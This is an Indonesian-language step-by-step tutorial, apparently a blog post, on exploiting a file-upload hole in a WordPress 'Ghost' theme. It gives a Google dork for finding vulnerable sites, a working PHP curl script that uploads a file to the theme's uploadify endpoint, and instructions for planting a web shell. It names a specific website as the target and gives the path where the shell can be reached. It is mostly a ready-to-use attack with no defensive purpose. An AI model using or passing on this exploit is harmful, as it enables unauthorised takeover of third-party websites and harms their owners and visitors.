![[Image: 13.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuwDv7B9ZPGavsKHC9hXtmoDDO6FyFrBsKoGdow9LU8jzLvRGgqxnXPeDGl1cODSqkJ1Cs76OUh8WkfWhxCwO-jVDSp48G5t9bCB29MoN_87bY6UADJnXkN2TMeVIGusbLQU3OFaWyBzI/s640/13.jpg)
Exploit Aslinya Disini http://1337day.com/exploit/21416
1. Download XAAMP nya Disini HERE
2. Install XAMMP
Google Dork : inurl:wp-content/themes/Ghost/
Jika Sudah terinstall kamu buka PHP.ini , cek di System C > xammp > php > php.ini
Lalu tekan CTRL+F lalu ketikkan curl lalu hapus tanda titik dua koma ( ; )
![[Image: 12.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnbEdqsZmkxpIOPlRBq3aPD-bVItTHvSjzqqTqDhxixUYOvEu83pLb62vvBBh9FWUYl4AiE59DX3jyLn0JmYfPKOmR4k5x6U3RrbLIsGibS17N5-OH0fUDPXEukcD1xYOO3g-isqhlVgs/s640/12.jpg)
Sekarang Kamu Copy Kan Exploitnya
<?php
$uploadfile="yourFile.php";
$ch = curl_init("http://{target}/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Lalu Simpan dengan namafile.php untuk nama bisa kamu pake sembarangan , disini saya akan simpan dengan Nama x.php
Sekarang , kamu copykan file shell kamu , Disini nama shell saya adalah a.php
Lalu , Kamu buka cmd , dan ketikkan cd\
ketikkan cd xammp [enter] dan cd php [enter]
![[Image: 14.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGn6N2ghG82rhUpD4bft2xrQah5fmK2clARSGqdq_ee6fZlFY2Lo_LqisuQaSHxYdB4nFB6mruX6rpFgTahGVGlR08hgIjvWh-WGcLnxB4kk1ewhz0BhIG1FtfuF1BP_-6iIZOz867VDk/s640/14.jpg)
Sekarang kita akan mengexploitkan targetnya disini saya dapat targetnya yaitu http://retotarahumara.com/
Sekarang Kamu Tambahkan dengan ini
/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Jadi websitenya akan menjadi http://retotarahumara.com/wp-content/the..._image.php
Lalu Jika Muncul {"status":"NOK", "ERR":"This file is incorect"} Berarti Vuln
Kembali ke CMD , ketikkan php namafile.php lalu Enter
![[Image: 15.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXA3QcbvDD62qgiI_zTkPAbPdAxnCAU9KGF4nKytljhzrbTkuSgWOEK38OO4GJXVd5TWk7QZF96fbecTNg5y4ZxgRXYEA0xn7J6g19sCJvxLH9VBP8qykm-ynmy9845WSJwSSzJtuxtrU/s640/15.jpg)
Jika muncul seperti itu maka Exploit Succes :))
Untuk shell Acces berada disini http:///wp-content/uploads/settingsimages/a.php
![[Image: 16.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQcMalWbm6QAc5-dBFDIftcreS4OaTtINsGXAaLMNssEMCExcyfXL0Vl5M0pzGOkQ7T2V432oPMD8m8jxcdUBVwFV2caIx_OEwvRiGqZ9FETFIztXXiJt663WYbMrGBObBFPju5ocUlyE/s640/16.jpg)